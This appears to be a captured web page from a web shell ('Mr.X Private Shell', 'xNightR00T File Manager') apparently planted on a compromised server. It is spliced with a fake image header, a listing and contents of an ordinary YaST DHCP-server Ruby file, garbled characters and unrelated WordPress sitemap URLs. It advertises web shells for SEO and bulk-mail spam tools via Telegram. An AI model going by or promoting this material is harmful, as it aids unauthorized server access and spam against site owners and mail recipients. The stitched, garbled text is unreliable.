xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
# encoding: utf-8

# File:	modules/DhcpServer.ycp
# Package:	Configuration of dhcp-server
# Summary:	Data for configuration of dhcp-server,
#              input and output functions.
# Authors:	Jiri Srain <jsrain@suse.cz>
#
# $Id$
#
# Representation of the configuration of dhcp-server.
# Input and output routines.
module Yast
  module DhcpServerRoutinesInclude
    def initialize_dhcp_server_routines(include_target)
      textdomain "dhcp-server"
    end

    # Merge section id and key together to one identifier
    # @param [String] type string section type
    # @param [String] id string section identifier
    # @return merged section type and id to one string
    def typeid2key(type, id)
      Builtins.sformat("%1 %2", type, id)
    end

    # Split section type and id to two separate strings
    # @param [String] key string section type and id merged into one string
    # @return a map with keys "type" and "id"
    def key2typeid(key)
      return { "type" => "", "id" => "" } if key == " "
      return nil if !Builtins.regexpmatch(key, "^[^ ]+ .+$")
      type = Builtins.regexpsub(key, "^([^ ]+) .+$", "\\1")
      id = Builtins.regexpsub(key, "^[^ ]+ (.+)$", "\\1")
      { "type" => type, "id" => id }
    end

    # Get children declarations of a declaration
    # @param [String] type strign declaration type
    # @param [String] id string declaration id
    # @return [Array] of items for the tree widget
    def getItems(type, id)
      entries = DhcpServer.GetChildrenOfEntry(type, id)
      return [] if entries == nil
      ret = Builtins.maplist(entries) do |e|
        type2 = Ops.get_string(e, "type", "group")
        id2 = Ops.get_string(e, "id", "")
        subentries = DhcpServer.GetChildrenOfEntry(type2, id2)
        full_id = typeid2key(type2, id2)
        if Ops.greater_than(Builtins.size(subentries), 0)
          next Item(Id(full_id), full_id, true, getItems(type2, id2))
        end
        Item(Id(full_id), full_id)
      end
      deep_copy(ret)
    end

    # Abort function
    # @return blah blah lahjk
    # global define boolean Abort() ``{
    #     if(AbortFunction != nil)
    # 	return eval(AbortFunction) == true;
    #     return false;
    # }

    # Create new section
    # @param @param what symbol specifying the section type, `global, `subnet
    #  or `host
    # @return [Hash] created section
    def createNewSection(what)
      if what == :global
        return {
          "default-lease-time" => 600,
          "max-lease-time"     => 7200,
          "ddns-update-style"  => "none",
          "ddns-updates"       => "off",
          "log-facility"       => "local7",
          "authoritative"      => ""
        }
      elsif what == :subnet
        return {
          "subnet"         => "",
          "netmask"        => "",
          "range"          => "",
          "option routers" => ""
        }
      elsif what == :host
        return { "host" => "", "hardware" => "", "fixed-address" => "" }
      end

      {}
    end
  end
end

Filemanager

Name Type Size Permission Actions
commandline.rb File 18.92 KB 0644
dialogs.rb File 17.35 KB 0644
dialogs2.rb File 68.16 KB 0644
dns-helps.rb File 7.74 KB 0644
dns-server-dialogs.rb File 22.48 KB 0644
dns-server-management.rb File 32.32 KB 0644
dns-server-wizard.rb File 40.66 KB 0644
helps.rb File 13.27 KB 0644
misc.rb File 1.12 KB 0644
options.rb File 39.38 KB 0644
routines.rb File 2.95 KB 0644
widgets.rb File 41.39 KB 0644
wizards.rb File 6.42 KB 0644
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1
https://vn-gateway.com/en/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/en/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/wp-sitemap-posts-elementor_library-1.xmlhttps://vn-gateway.com/en/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/en/wp-sitemap-users-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-users-1.xml